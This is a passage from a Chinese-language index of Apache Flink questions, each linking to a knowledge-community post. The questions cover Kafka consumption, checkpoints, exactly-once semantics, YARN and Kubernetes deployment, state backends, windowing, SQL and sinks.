中的所有数据(动态增加)关联,关联之后会做一些额外的操作,这个有什么比较可行的方案?](https://t.zsxq.com/mYV37qF) 225、[flink消费kafka数据,设置1分钟checkpoint一次,假如第一次checkpoint完成以后,还没等到下一次checkpoint,程序就挂了,kafka offset还是第一次checkpoint记录的offset,那么下次重新启动程序,岂不是多消费数据了?那flink的 exactly one消费语义是怎么样的?](https://t.zsxq.com/buFeyZr) 226、[程序频繁发生Heartbeat of TaskManager with id container_e36_1564049750010_5829_01_000024 timed out. 心跳超时,一天大概10次左右。是内存没给够吗?还是网络波动引起的](https://t.zsxq.com/Znyja62) 227、[有没有性能优化方面的指导文章?](https://t.zsxq.com/AA6ma2Z) 228、[flink消费kafka是如何监控消费是否正常的,有啥好办法?](https://t.zsxq.com/a2N37a6) 229、[我按照官方的wordcount案例写了一个例子,然后在main函数中起了一个线程,原本是准备定时去更新某些配置,准备测试一下是否可行,所以直接在线程函数中打印一条语句测试是否可行。现在测试的结果是不可行,貌似这个线程根本就没有执行,请问这是什么原因呢? 按照理解,JobClient中不是反射类执行main函数吗, 执行main函数的时候为什么没有执行这个线程的打印函数呢?](https://t.zsxq.com/m2FeeMf) 230、[请问我想保留最近多个完成的checkpoint数据,是通过设置 state.checkpoints.num-retained 吗?要怎么使用?](https://t.zsxq.com/EyFUb6m) 231、[有没有etl实时数仓相关案例么?比如二十张事实表流join](https://t.zsxq.com/rFeIAeA) 232、[为什么我扔到flink 的stream job,立刻就finished](https://t.zsxq.com/n2RFmyN) 233、[有没有在flink上机器学习算法的一些例子啊,除了官网提供的flink exampke里的和flink ml里已有的](https://t.zsxq.com/iqJiyvN) 234、[如果我想扩展sql的关键词,比如添加一些数据支持,有什么思路,现在想的感觉都要改calcite(刚碰flink感觉难度太大了)](https://t.zsxq.com/uB6aUzZ) 235、[我想实现统计每5秒中每个类型的次数,这个现在不输出,问题出在哪儿啊](https://t.zsxq.com/2BEeu3Z) 236、[我用flink往hbase里写数据,有那种直接批量写hfile的方式的demo没](https://t.zsxq.com/VBA6IUR) 237、[请问怎么监控Kafka消费是否延迟,是否出现消息积压?你有demo吗?这种是用Springboot自己写一个监控,还是咋整啊?](https://t.zsxq.com/IieMFMB) 238、[请问有计算pv uv的例子吗](https://t.zsxq.com/j2fM3BM) 239、[通过控制流动态修改window算子窗口类型和长度要怎么写](https://t.zsxq.com/Rb2Z7uB) 240、[flink的远程调试能出一版么?网上资料坑的多](https://t.zsxq.com/UVbaQfM) 241、[企业里,Flink开发,java用得多,还是scala用得多?](https://t.zsxq.com/AYVjAuB) 242、[flink的任务运行在yarn的环境上,在yarn的resourcemanager在进行主备切换时,所有的flink任务都失败了,而MR的任务可以正常运行。报错信息如下:AM is not registered for known application attempt: appattempt_1565306391442_89321_000001 or RM had restarted after AM registered . AM should re-register 请问这是什么原因,该如何处理呢?](https://t.zsxq.com/j6QfMzf) 243、[请教一个分布式问题,比如在Flink的多个TaskManager上统计指标count,TM1有两条数据,TM2有一条数据,程序是怎么计算出来是3呢?原理是怎么样的](https://t.zsxq.com/IUVZjUv) 244、[现在公司部分sql查询oracle数据特别的慢,因为查询条件很多想问一下有什么方法,例如基于大数据组件可以加快查询速度的吗?](https://t.zsxq.com/7MFEQR3) 245、[想咨询下有没有做过flink同步配置做自定义计算的系统?或者有没有什么好的建议?业务诉求是希望业务用户可以自助配置计算规则做流式计算](https://t.zsxq.com/Mfa6aQB) 246、[我这边有个实时同步数据的任务,白天运行的时候一直是正常的,一到凌晨2点多之后就没有数据sink进mysql。晚上会有一些离线任务和一些dataX任务同步数据到mysql。但是任务一切都是正常的,ck也很快20ms,数据也是正常消费。看了yarn上的日志,没有任何error。自定义的sink里面也设置了日志打印,但是log里没有。这种如何快速定位问题。](https://t.zsxq.com/z3bunyN) 247、[有没有flink处理异常数据的案例资料](https://t.zsxq.com/Y3fe6Mn) 248、[flink中如何传递一个全局变量](https://t.zsxq.com/I2Z7Ybm) 249、[台4核16G的Flink taskmanager配一个单独的Yarn需要一台啥样的服务器?其他功能都不需要就一个调度的东西?](https://t.zsxq.com/iIUZrju) 250、[side-output 的分享](https://t.zsxq.com/m6I2BEE) 251、[使用 InfluxDB + Grafana 监控flink能否配置告警。是不是prometheus更强大点?](https://t.zsxq.com/amURFme) 252、[我们线上遇到一个问题,带状态的算子没有指定 uid,现在代码必须改,那个带状态的算子 不能正常恢复了,有解吗?通过某种方式能获取到系统之前自动生成的uid吗?](https://t.zsxq.com/rZfyZvn) 253、[tableEnv.registerDataStream("Orders", ds, "user, product, amount, proctime.proctime, rowtime.rowtime");请问像这样把流注册成表的时候,这两个rowtime分别是什么意思](https://t.zsxq.com/uZz3Z7Q) 254、[我想问一下 flink on yarn session 模式下提交任务官网给的例子是 flink run -c xxx.MainClass job.jar 这里是怎么知道 yarn 上的哪个是 flink 的 appid 呢?](https://t.zsxq.com/yBiEyf2) 255、[Flink Netty Connector 这个有详细的使用例子? 通过Netty建立的source能直接回复消息吗?还是只能被动接受消息?](https://t.zsxq.com/yBeyfqv) 256、[请问flink sqlclient 提交的作业可以用于生产环境吗?](https://t.zsxq.com/FIEia6M) 257、[flink批处理写回mysql是否没法用tableEnv.sqlUpdate("insert into t2 select * from t1")?作为sink表的t2要如何注册?查跟jdbc相关的就两个TableSink,JDBCAppendTableSink用于BatchTableSink,JDBCUpertTablSink用于StreamTableSink。前者只接受insert into values语法。所以我是先通过select from查询获取到DataSet再JDBCAppendTableSink.emitDataSet(ds)实现的,但这样达不到sql rule any目标](https://t.zsxq.com/ZBIaUvF) 258、[请问在stream模式下,flink的计算结果在不落库的情况下,可以通过什么restful api获取计算结果吗](https://t.zsxq.com/aq3BIU7) 259、[现在我有场景,需要把一定的消息发送给kafka topic指定的partition,该怎么搞?](https://t.zsxq.com/NbYnAYF) 260、[请问我的job作业在idea上运行正常 提交到生产集群里提示Caused by: java.lang.NoSuchMethodError: org.apache.flink.api.java.ClosureCleaner.clean(Ljava/lang/Object;Z)V请问如何解决](https://t.zsxq.com/YfmAMfm) 261、[遇到一个很奇怪的问题,在使用streamingSQL时,发现timestamp在datastream的时候还是正常的,在注册成表print出来的时候就少了八小时,大佬知道是什么原因么?](https://t.zsxq.com/72n6MVb) 262、[请问将flink的产生的一些记录日志异步到kafka中,需要如何配置,配置后必须要重启集群才会生效吗](https://t.zsxq.com/RjQFmIQ) 263、[星主你好,问下flink1.9对维表join的支持怎么样了?有文档吗](https://t.zsxq.com/Q7u3vzR) 264、[请问下 flink slq: SELECT city_name as city_name, count(1) as total, max(create_time) as create_time FROM * 。代码里面设置窗口为: retractStream.timeWindowAll(Time.minutes(5))一个global窗口,数据写入hdfs 结果数据重复 ,存在两条完全重复的数据如下 常州、2283、 1566230703):请问这是为什么](https://t.zsxq.com/aEEA66M) 265、[我用rocksdb存储checkpoint,线上运行一段时间发展checkpoint占用空间越来越大,我是直接存本地磁盘上的,怎么样能让它自动清理呢?](https://t.zsxq.com/YNrfyrj) 266、[flink应该在哪个用户下启动呢,是root的还是在其他的用户呢](https://t.zsxq.com/aAaqFYn) 267、[link可以读取lzo的文件吗](https://t.zsxq.com/2nUBIAI) 268、[怎么快速从es里面便利数据?我们公司现在所有的数据都存在Es里面的;我发现每次从里面scan数据的时候特别慢;你那有没有什么好的办法?](https://t.zsxq.com/beIY7mY) 269、[如果想让数据按照其中一个假如f0进行分区,然后每一个分区做处理的时候并行度都是1怎么设置呢](https://t.zsxq.com/fYnYrR7) 270、[近在写算子的过程中,使用scala语言写flink比较快,而且在process算子中实现ontime方式时,可以使用scala中的listbuff来输出一个top3的记录;那么到了java中,只能用ArrayList将flink中的ListState使用get()方法取出之后放在ArrayList吗?](https://t.zsxq.com/nQFYrBm) 271、[请问老师能否出一些1.9版本维表join的例子 包括async和维表缓存?](https://t.zsxq.com/eyRRv7q) 272、[flink kaka source设置为从组内消费,有个问题是第一次启动任务,我发现kafka中的历史数据不会被消费,而是从当前的数据开始消费,而第二次启动的时候才会从组的offset开始消费,有什么办法可以让第一次启动任务的时候可以消费kafka中的历史数据吗](https://t.zsxq.com/aMRzjMb) 273、[1.使用flink定时处理离线数据,有时间戳字段,如何求出每分钟的最大值,类似于流处理窗口那样,2如果想自己实现批流统一,有什么好的合并方向吗?比如想让流处理使用批处理的一个算子。](https://t.zsxq.com/3ZjiEMv) 274、[flink怎么实现流式数据批量对待?流的数据是自定义的source,读取的redis多个Hash表,需要控制批次的概念](https://t.zsxq.com/AIYnEQN) 275、[有人说不推荐在一个task中开多个线程,这个你怎么看?](https://t.zsxq.com/yJuFEYb) 276、[想做一个运行在hbase+es架构上的sql查询方案,flink sql能做吗,或者有没有其他的解决方案或者思路?](https://t.zsxq.com/3f6YBmu) 277、[正在紧急做第一个用到Flink的项目,咨询一下,Flink 1.8.1写入ES7就是用自带的Sink吗?有没有例子分享一下,我搜到的都是写ES6的。这种要求我知道不适合提,主要是急,自己试几下没成功。T T](https://t.zsxq.com/jIAqVnm) 278、[手动停止任务后,已经保存了最近一次保存点,任务重新启动后,如何使用上一次检查点?](https://t.zsxq.com/2fAiuzf) 279、[批处理使用流环境(为了使用窗口),那如何确定批处理结束,就是我的任务可以知道批文件读取完事,并且处理完数据后关闭任务,如果不能,那批处理如何实现窗口功能](https://t.zsxq.com/BIiImQN) 280、[如果限制只能在window 内进行去重,数据量还比较大,有什么好的方法吗?](https://t.zsxq.com/Mjyzj66) 281、[端到端exactly once有没有出文章](https://t.zsxq.com/yv7Ujme) 282、[流怎么动态加?,流怎么动态删除?,参数怎么动态修改 (广播](https://t.zsxq.com/IqNZFey) 283、[自定义的source数据源实现了有批次的概念,然后Flink将这个一个批次流注册为多个表join操作,有办法知道这个sql什么时候计算完成了?](https://t.zsxq.com/r7AqvBq) 284、[编译 Flink 报错,群主遇到过没,什么原因](https://t.zsxq.com/rvJiyf6) 285、[我现在是flink on yarn用zookeeper做HA现在在zk里查看检查点信息,为什么里面的文件是ip,而不是路径呢?我该如何拿到那个路径。 - 排除rest api 方式获取,因为任务关了restapi就没了 -排除history server,有点不好用](https://t.zsxq.com/nufIaey) 286、[在使用streamfilesink消费kafka之后进行hdfs写入的时候,当直接关闭flink程序的时候,下次再启动程序消费写入hdfs的时候,文件又是从part-0-0开始,这样就跟原来写入的冲突了,该文件就一直处于ingress状态。](https://t.zsxq.com/Fy3RfE6) 287、[现在有一个实时数据分析的需求,数据量不大,但要求sink到mysql,因为是实时更新的,我现在能想到的处理方法就是每次插入一条数据的时候,先从mysql读数据,如果有这条,就执行update,没有的话就insert,但是这样的话每写一条数据就有两次交互了。想问一下老师有没有更好的办法,或者flink有没有内置的api可以执行这种不确定是更新还是插入的操作](https://t.zsxq.com/myNF2zj) 288、[Flink设置了checkpoint,job manage会定期删除check point数据,但是task manage不删除,这个是什么原因](https://t.zsxq.com/ZFiMzrF) 289、[请教一下使用rocksdb作为statebackend ,在哪里可以监控rocksdb io 内存指标呢](https://t.zsxq.com/z3RzJUV) 290、[状态的使用场景,以及用法能出个文章不,这块不太了解](https://t.zsxq.com/AUjE2ZR) 291、[请问一下 Flink 1.9 SQL API中distinct count 是如何实现高效的流式去重的?](https://t.zsxq.com/aaynii6) 292、[在算子内如何获取当前算子并行度以及当前是第几个task](https://t.zsxq.com/mmEyVJA) 293、[有没有flink1.9结合hive的demo。kafka到hive](https://t.zsxq.com/fIqNF6y) 294、[能给讲讲apache calcite吗](https://t.zsxq.com/ne6UZrB) 295、[请问一下像这种窗口操作,怎么保证程序异常重启后保持数据的状态呢?](https://t.zsxq.com/VbUVFMr) 296、[请问一下,我在使用kafkasource的时候,把接过来的Jsonstr转化成自定义的一个类型,用的是gson. fromJson(jsonstr,classOf[Entity])报图片上的错误了,不知道怎么解决,在不转直接打印的情况下是没问题的](https://t.zsxq.com/EMZFyZz) 297、[DataStream读数据库的表,做多表join,能设置时间窗口么,一天去刷一次。流程序会一直拉数据,数据库扛不住了](https://t.zsxq.com/IEieI6a) 298、[请问一下flink支持多路径通配读取吗?例如路径:s3n://pekdc2-deeplink-01/Kinesis/firehose/2019/07/03/*/* ,通配读取找不到路径。是否需要特殊设置](https://t.zsxq.com/IemmiY7) 299、[flink yarn环境部署 但是把容器的url地址删除。就会跳转到的hadoop的首页。怎么屏蔽hadoop的yarn首页地址呢?要不暴露这个地址用户能看到所有任务很危险](https://t.zsxq.com/QvZFUNN) 300、[flink sql怎么写一个流,每秒输出当前时间呢](https://t.zsxq.com/2JiubeM) 301、[因为想通过sql弄一个数据流。哈哈 另外想问一个问题,我把全局设置为根据处理时间的时间窗口,那么我在processAllWindowFunction里面要怎么知道进来的每个元素的处理时间是多少呢?这个元素进入这个时间窗口的依据是什么](https://t.zsxq.com/bQ33BmM) 302、[如何实现一个设备上报的数据存储到同一个hdfs文件中?](https://t.zsxq.com/rB6ybYF) 303、[我自己写的kafka生产者测试,数据格式十分简单(key,i)key是一个固定的不变的字符串,i是自增的,flink consumer这边我开了checkpoint. 并且是exactly once,然后程序很简单,就是flink读取kafka的数据然后直接打印出来,我发现比如我看到打印到key,10的时候我直接关掉程序,然后重新启动程序,按理来说应当是从上次的offset继续消费,也就是key,11,但实际上我看到的可能是从key,9开始,然后依次递增,这是是不是说明是重复消费了,那exactly one需要怎么样去保障?](https://t.zsxq.com/MVfeeiu) 304、[假设有一个数据源在源源不断的产生数据,到Flink的反压来到source端的时候,由于Flink处理数据的速度跟不上数据源产生数据的速度, 问题1: 这个时候在Flink的source端会怎么处理呢?是将处理不完的数据丢弃还是进行缓存呢? 问题2: 如果是缓存,怎么进行缓存呢?](https://t.zsxq.com/meqzJme) 305、[一个stream 在sink多个时,这多个sink是串行 还是并行的。](https://t.zsxq.com/2fEeMny) 306、[我想在流上做一个窗口,触发窗口的条件是固定的时间间隔或者数据量达到预切值,两个条件只要有一个满足就触发,除了重写trigger在,还有什么别的方法吗?](https://t.zsxq.com/NJY76uf) 307、[使用rocksdb作为状态后端,对于使用sql方式对时间字段进行group by,以达到去窗口化,但是这样没办法对之前的数据清理,导致磁盘空间很大,对于这种非编码方式,有什么办法设置ttl,清理以前的数据吗](https://t.zsxq.com/A6UN7eE) 308、[请问什么时间窗为什么会有TimeWindow{start=362160000, end=362220000} 和 TimeWindow{start=1568025300000, end=1568025360000}这两种形式,我都用的是一分钟的TumblingEventTimeWindows,为什么会出现不同的情况?](https://t.zsxq.com/a2fUnEM) 309、[比如我统计一天的订单量。但是某个数据延迟一天才到达。比如2019.08.01这一天订单量应该是1000,但是有个100的单据迟到了,在2019.08.02才到达,那么导致2019.08.01这一天统计的是900.后面怎么纠正这个错误的结果呢](https://t.zsxq.com/Y3jqjuj) 310、[flink streaming 模式下只使用堆内内存么](https://t.zsxq.com/zJaMNne) 311、[如果考虑到集群的迁移,状态能迁移吗](https://t.zsxq.com/EmMrvVb) 312、[我们现在有一个业务场景,数据上报的值是这样的格式(时间,累加值),我们需要这样的格式数据(时间,当前值)。当前值=累加值-前一个数据的累加值。flink如何做到呢,有考虑过state机制,但是服务宕机后,state就被清空了](https://t.zsxq.com/6EUFeqr) 313、[Flink On k8s 与 Flink on Yarn相比的优缺点是什么?那个更适合在生产环境中使用呢](https://t.zsxq.com/y7U7Mzf) 314、[有没有datahub链接flink的 连接器呀](https://t.zsxq.com/zVNbaYn) 315、[单点resourcemanager 挂了,对任务会产生什么影响呢](https://t.zsxq.com/FQRNJ2j) 316、[flink监控binlog,跟另一张维表做join后,sink到MySQL的最终表。对于最终表的增删改操作,需要定义不同的sink么?](https://t.zsxq.com/rnemUN3) 317、[请问窗口是在什么时候合并的呢?例如:数据进入windowoperator的processElement,如果不是sessionwindow,是否会进行窗口合并呢?](https://t.zsxq.com/JaaQFqB) 318、[Flink中一条流能参与多路计算,并多处输出吗?他们之前会不会相互影响?](https://t.zsxq.com/AqNFM33) 319、[keyBy算子定义是将一个流拆分成不相交的分区,每个分区包含具有相同的key的元素。我不明白的地方是: keyBy怎么设置分区数,是给这个算子设置并行度吗? 分区数和slot数量是什么关系?](https://t.zsxq.com/nUzbiYj) 320、[动态cep-pattern,能否详细说下?滴滴方案未公布,您贴出来的几张图片是基于1.7的。或者有什么想法也可以讲解下,谢谢了](https://t.zsxq.com/66URfQb) 321、[问题1:使用常驻型session ./bin/yarn-session.sh -n 10 -s 3 -d启动,这个时候分配的资源是yarn 队列里面的, flink提交任务 flink run xx.jar, 其余机器是怎样获取到flink需要运行时的环境的,因为我只在集群的一台机器上有flink 安装包。](https://t.zsxq.com/maEQ3NR) 322、[flink task manager中slot间的内存隔离,cpu隔离是怎么实现的?flink 设计slot的概念有什么意义,为什么不像spark executor那样,内部没有做隔离?](https://t.zsxq.com/YjEYjQz) 323、[spark和kafka集成,direct模式,spark的一个分区对应kafka的一个主题的一个分区。那flink和kafka集成的时候,怎么消费kafka的数据,假设kafka某个主题5个partition](https://t.zsxq.com/nuzvVzZ) 324、[./bin/flink run -m yarn-cluster 执行的flink job ,作业自己打印的日志通过yarn application的log查看不了,只有集群自身的日志,程序中logger.info打印日志存放在哪,还是我打包的方式问题,打日志用的是slf4j。](https://t.zsxq.com/27u3ZZf) 325、[在物联网平台中,需要对每个key下的数据做越限判断,由于每个key的越限值是不同的,越限值配置在实时数据库中。 若将越限值加载到state中,由于key的量很大(大概3亿左右),会导致state太大,可能造成内存溢出。若在处理数据时从实时数据库中读取越限值,由于网络IO开销,可能造成实时性下降。请问该如何处理?谢谢](https://t.zsxq.com/miuzFY3) 326、[如果我一个flink程序有多个window操作,时间戳和watermark是不是每个window都需要分配,还有就是事件时间是不是一定要在数据源中就存在某个字段](https://t.zsxq.com/amURvZR) 327、[有没有flink1.9刚支持的用ddl链接kafka并写入hbase的资料,我们公司想把离线的数仓逐渐转成实时的,写sql对于我们来说上手更快一些,就想找一些这方面的资料学习一下。](https://t.zsxq.com/eqFuBYz) 328、[flink1.9 进行了数据类型的转化时发生了不匹配的问题, 目前使用的Type被弃用,推荐使用是datatypes 类型,但是之前使用的Type类型的方法 对应的schema typeinformation 目前跟datatypes的返回值不对应,请问下 该怎么去调整适配?](https://t.zsxq.com/yVvR3V3) 329、[link中处理数据其中一条出了异常都会导致整个job挂掉?有没有方法(除了异常捕获)让这条数据记录错误日志就行 下面的数据接着处理呢? 粗略看过一些容错处理,是关于程度挂了重启后从检查点拉取数据,但是如果这条数据本身就问提(特别生产上,这样就导致job直接挂了,影响有点大),那应该怎么过滤掉这条问题数据呢(异常捕获是最后的方法](https://t.zsxq.com/6AIQnEi) 330、[我在一个做日报的统计中使用rabbitmq做数据源,为什么rabbitmq中的数据一直处于unacked状态,每分钟触发一次窗口计算,并驱逐计算过的元素,我在测试环境数据都能ack,但是一到生产环境就不行了,也没有报错,有可能是哪里出了问题啊](https://t.zsxq.com/RBmi2vB) 331、[我们目前数据流向是这样的,kafka source ,etl,redis sink 。这样chk 是否可以保证端到端语义呢?](https://t.zsxq.com/fuNfuBi) 332、[1.在通过 yarn-session 提交 flink job 的时候。flink-core, flink-clients, flink-scala, flink-streaming-scala, scala-library, flink-connector-kafka-0.10 那些应该写 provided scope,那些应该写 compile scope,才是正确、避免依赖冲突的姿势? 2.flink-dist_2.11-1.8.0.jar 究竟包含了哪些依赖?(这个文件打包方式不同于 springboot,无法清楚看到有哪些 jar 依赖)](https://t.zsxq.com/mIeMzvf) 333、[Flink 中使用 count window 会有这样的问题就是,最后有部分数据一直没有达到 count 的值,然后窗口就一直不触发,这里看到个思路,可以将 time window + count window 组合起来](https://t.zsxq.com/AQzj6Qv) 334、[flink流处理时,注册一个流数据为Table后,该流的历史数据也会一直在Table里面么?为什么每次来新数据,历史处理过得数据会重新被执行?](https://t.zsxq.com/VvR3Bai) 335、[available是变化数据,除了最新的数据被插入数据库,之前处理过数据又重新执行了几次](https://t.zsxq.com/jMfyNZv) 336、[这里两天在研究flink的广播变量,发现一个问题,DataSet数据集中获取广播变量,获取的内存地址是一样的(一台机器维护一个广播数据集)。在DataStream中获取广播变量就成了一个task维护一个数据集。(可能是我使用方式有问题) 所以想请教下星主,DataStream中获取一个画面变量可以如DataSet中一台机器维护一个数据吗?](https://t.zsxq.com/m6Yrv7Q) 337、[Flink程序开启checkpoint 机制后,用yarn命令多次killed以后,ckeckpoint目录下有多个job id,再次开辟资源重新启动程序,程序如何找到上一次jobid目录下,而不是找到其他的jobid目录下?默认是最后一个还是需要制定特定的jobid?](https://t.zsxq.com/nqzZrbq) 338、[发展昨天的数据重复插入问题,是把kafka里进来的数据流registerDataStream注册为Table做join时,打印表的长度发现,数据会一直往表里追加,怎样才能来一条处理一条,不往上追加呀](https://t.zsxq.com/RNzfQ7e) 339、[flink1.9 sql 有没有类似分区表那样的处理方式呢?我们现在有一个业务是1个source,但是要分别计算5分钟,10分钟,15分钟的数据。](https://t.zsxq.com/AqRvNNj) 340、[我刚弄了个服务器,在启动基础的命令时候发现task没有启动起来,导致web页是三个0,我看了log也没有报错信息,请问您知道可能是什么问题吗?](https://t.zsxq.com/q3feIuv) 241、[我自定义了个 Sink extends RichSinkFunction,有了 field: private transient Object lock; 这个 lock 我直接初始化 private transient Object lock = new Object(); 就不行,在 invoke 里 使用lock时空指针,如果lock在 自定义 Sink 的 构造器初始化也不行。但是在 open 方法里初始化就可以,为什么?能解释一下 执行原理吗?如果一个slot 运行着5个 sink实例,那么 这个sink对象会new 5个还是1个?](https://t.zsxq.com/EIiyjeU) 342、[请问Kafka的broker 个数怎么估算?](https://t.zsxq.com/aMNnIy3) 343、[flink on yarn如何远程调试](https://t.zsxq.com/BU7iqbi) 344、[目前有个需求:就是源数据是dataA、dataB、DataC通过kafka三个topic获取,然后进行合并。 但是有有几个问题,目前不知道怎么解决: dataA="id:10001,info:***,date:2019-08-01 12:23:33,entry1:1,entryInfo1:***" dataB="id:10001,org:***,entry:1" dataC="id:10001,location:***" (1) 如何将三个流合并? (1) 数据中dataA是有时间的,但是dataB和dataC中都没有时间戳,那么如何解决eventTime及迟到乱序的问题?帮忙看下,谢谢](https://t.zsxq.com/F6U7YbY) 345、[我flink从kafka读json数据,在反序列化后中文部分变成了一串问号,请问如何做才能使中文正常](https://t.zsxq.com/JmIqfaE) 346、[我有好几个Flink程序(独立jar),在线业务数据分析时都会用到同样的一批MySQL中的配置数据(5千多条),现在的实现方法是每一个程序都是独立把这些配置数据装到内存中,便于快速使用,但现在感觉有些浪费资源和结构不够美观,请问这类情况有什么其他的解决方案吗?谢谢](https://t.zsxq.com/3BMZfAM) 347、[Flink checkpoint 选 RocksDBStateBackend 还是 FsStatebackEnd ,我们目前是任务执行一段时间之后 任务就会被卡死。](https://t.zsxq.com/RFMjYZn) 348、[flink on k8s的高可用、扩缩容这块目前还有哪些问题?](https://t.zsxq.com/uVv7uJU) 349、[有个问题问一下,是这样的现在Kafka4个分区每秒钟生产4000多到5000条日志数据,但是在消费者FLINK这边接收我只开了4个solt接收,这边只是接收后做切分存储,现在出现了延迟现象,我不清楚是我这边处切分慢了还是Flink接收kafka的数据慢了?Flink UI界面显示这两个背压高](https://t.zsxq.com/zFq3fqb) 350、[想请问一下,在flink集群模式下,能不能指定某个节点来执行一个task?](https://t.zsxq.com/NbaMjem) + [请问一下aggrefunction 的merge方法什么时候会用到呢,google上有答案说合并相同的key, 但相同的key应该是被hash相同的task上了?这块不是很理解](https://t.zsxq.com/VnEim6m) + [请问flink遇到这种问题怎么解决?1. eventA发起事件,eventB响应事件,每分钟统计事件的响应的成功率。说明,eventA和eventB有相同的commitId关联,eventA到flink的时间早于eventB的时间,但eventB到达的时间也有可能早于eventA。要求是:eventA有A,B,C,D,E五条数据,如果eventB有A',B',C',X',Y'五条数据,成功率是3/5.2. 每分钟统计一次eventC成功率(状态0、1)。但该事件日志会重复报,只统计eventTime最早的一条。上一分钟统计到过的,下一分钟不再统计](https://t.zsxq.com/eMnMrRJ) + [Flink当前版本中Yarn,k8s,standalone的HA设计方案与源码解析请问可以系统性讲讲么](https://t.zsxq.com/EamqrFQ) + [怎么用javaAPI提交job以yarn-cluster模式运行](https://t.zsxq.com/vR76amq) + [有人遇到过流损坏的问题么?不知道怎么着手解决?](https://t.zsxq.com/6iMvjmq) + [从这个日志能看出什么异常的原因吗?我查看了kafka,yarn,zookeeper。这三个组件都没有任何异常](https://t.zsxq.com/uByFUrb) + [为啥flink内部维护两套通信框架,client与jobmanager和jobmanager与taskmanager是akka通信,然而takmanager之间是netty通信?](https://t.zsxq.com/yvBiImq) + [问各位球友一个小问题,flink 的 wordcount ,输出在控制台的时候,前面有个数字 > 是什么意思](https://t.zsxq.com/yzzBMji) + [从kafka的topicA读数据,转换后写入topicB,开启了checkpoint,任务启动后正常运行,新的topic也有数据写入,但是想监控一下消费topicA有没有延迟,使用kafka客户端提供的脚本查看groupid相关信息,提示没有该groupid](https://t.zsxq.com/MNFUVnE) + [将flink分流之后,再进行窗口计算,如何将多个窗口计算的结果汇总起来 作为一个sink,定时输出? 我想将多个流计算的不同实时统计指标,比如每1min对多个指标进行统计(多个指标分布在不同的流里面),然后将多个指标作为一条元组存入mysql中?](https://t.zsxq.com/mUfm2zF) + [Flink最终如何输出到数据大屏上去。](https://t.zsxq.com/nimeA66) + [为什么我keyby 之后,不同key的数据会进入同一个AggregateFunction中吗? 还是说不同key用的AggregateFunction实列是同一个呢?我在AggregateFunction中给一个对象赋值之后,发现其他key的数据会把之前的数据覆盖,这是怎么回事啊?](https://t.zsxq.com/IMzBUFA) + [flink窗口计算的结果怎么和之前的结果聚合在一起](https://t.zsxq.com/yFI2FYv) + [flink on yarn 的任务该如何监控呢,之前自带 influxdb metrics 好像无法采集到flink on yarn 的指标](https://t.zsxq.com/ZZ3FmqF) + [link1.9.0消费kafka0.10.1.1数据时,通过ui监控查看发现部分分区的current offset和commit offset一直显示为负数,随着程序运行也始终不变,麻烦问下这是怎么回事?](https://t.zsxq.com/QvRNjiU) + [flink 1.9 使用rank的时候报,org.apache.flink.table.api.TableException: RANK() on streaming table is not supported currently](https://t.zsxq.com/Y7MBaQb) + [Flink任务能不能动态的变更source源kafka的topic,但是又不用重启任务](https://t.zsxq.com/rzVjMjM) + [1、keyed state 和opeater state 区分点是啥(是否进行了shuffle流程?) 2、CheckpointedFunction 这个接口的作用是啥? 3、何时调用这个snapshotState这个方法?](https://t.zsxq.com/ZVnEyne) + [请教一下各位大佬,日志一般都怎么收集?task manager貌似把不同job的日志都打印在一起,有木有分开打印的办法?](https://t.zsxq.com/AayjeiM) + [最近接到一个需求,统计今天累计在线人数并且要去重,每5秒显示一次结果,请问如何做这个需求?](https://t.zsxq.com/IuJ2FYR) + [目前是flink消费kafka的一个问题。kafka使用的是阿里云的kafka,可以申请consumer。目前在同一个A-test的topic下,使用A1的consumer组进行消费,但是在两个程序里,source端得到的数据量差别很大,图一是目前消费kafka写入到另一个kafka的topic中,目前已知只有100条;图二是消费kafka,写入到hdfs中。两次消费起始偏移量一致(消费后,恢复偏移量到最初再消费)按照时间以及设置从头开始消费的策略也都还是只有100条;后面我把kafka的offset提交到checkpoint选项关掉了,也还是只有100条。很奇怪,所以想问一下,目前这个问题是要从state来出发解决](https://t.zsxq.com/eqBUZFm) + [问一下 grafana的dashboard 有没有推荐的,我们现在用是prometheus pushgateway reporter来收集metric。但是目前来说,到底哪些指标是要重点关注的还是不太清楚](https://t.zsxq.com/EYz7iMV) + [on yarn 1. session 模式提交是不是意味着 多个flink任务会由同一个 jobManager 管理 2. per-job 模式 会启动各自多个jobManager](https://t.zsxq.com/u3vVV3b) + [您在flink里面使用过lettuce连接redis cluster吗,我这里使用时报错,Cannot retrieve initial cluster partitions from initial URIs](https://t.zsxq.com/VNnEQJ6) + [zhisheng你好,我在使用flink滑动窗口时,每10分钟会向redis写入大量的内容,影响了线上性能,这个有什么办法可以控制写redis的速度吗?](https://t.zsxq.com/62ZZJmi) + [flink standalone模式,启动服务的命令为:flink run -c 类名 jar包 。对应的Slots怎么能均匀分布呢?目前遇到问题,一直使用一个机器的Slots,任务多了后直接会把taskjob挂掉。报错信息如二图](https://t.zsxq.com/2zjqVnE) + [zhisheng你好,像standalone与yarn集群,其master与workers相互通信都依赖于ssh协议,请问有哪种不依赖于ssh协议的搭建方式吗?](https://t.zsxq.com/qzrvbaQ) + [官网中,这两种周期性watermaker的产生分别适用什么场景呢?](https://t.zsxq.com/2fUjAQz) + [周期性的watermarke 设置定时产生, ExecutionConfig.setAutoWatermarkInterval(…),这个定时的时间一般怎样去评估呢?](https://t.zsxq.com/7IEAyV3) + [想问一下能否得到flink分配资源的时间?](https://t.zsxq.com/YjqRBq3) + [问下flink向kafka生产数据有时候报错:This server does not host this topic-partition](https://t.zsxq.com/vJyJiMJ) + [flink yarn 模式启动,log4j. properties配置信息见图片,yarn启动页面的taskmanager能看到日志输出到stdout,但是在指定的日志文件夹中就是没有日志文件生成。,本地运行有日志文件的](https://t.zsxq.com/N3ZrZbQ) + [教一个问题。flink2hbase 如何根据hbase中的日期字段,动态按天建表呢?我自定义了hbase sink,在invoke方法中根据数据的时间建表,但是带来了一个问题,每条数据都要去check表是否存在,这样会产生大量的rpc请求。请问星主大大,针对上述这种情况,有什么好的解决办法吗?](https://t.zsxq.com/3rNBubU) + [你好,有关于TM,slots,内存,线程数,进程数,cpu,调度相关的资料吗?比如一个slot起多少线程,为什么,如何起的,task是如何调度的之类的。网上没找到想要的,书上写的也不够细。源码的话刚开始看不太懂,所以想先找找资料看看](https://t.zsxq.com/buBIAMf) + [能否在flink中只新建一个FlinkKafkaConsumer读取多个kafka的topics ,这些topics的处理逻辑都是一样的 最终将数据写入每个topic对应的es表 请问这个实现逻辑是怎样的 ](https://t.zsxq.com/EY37aEm) + 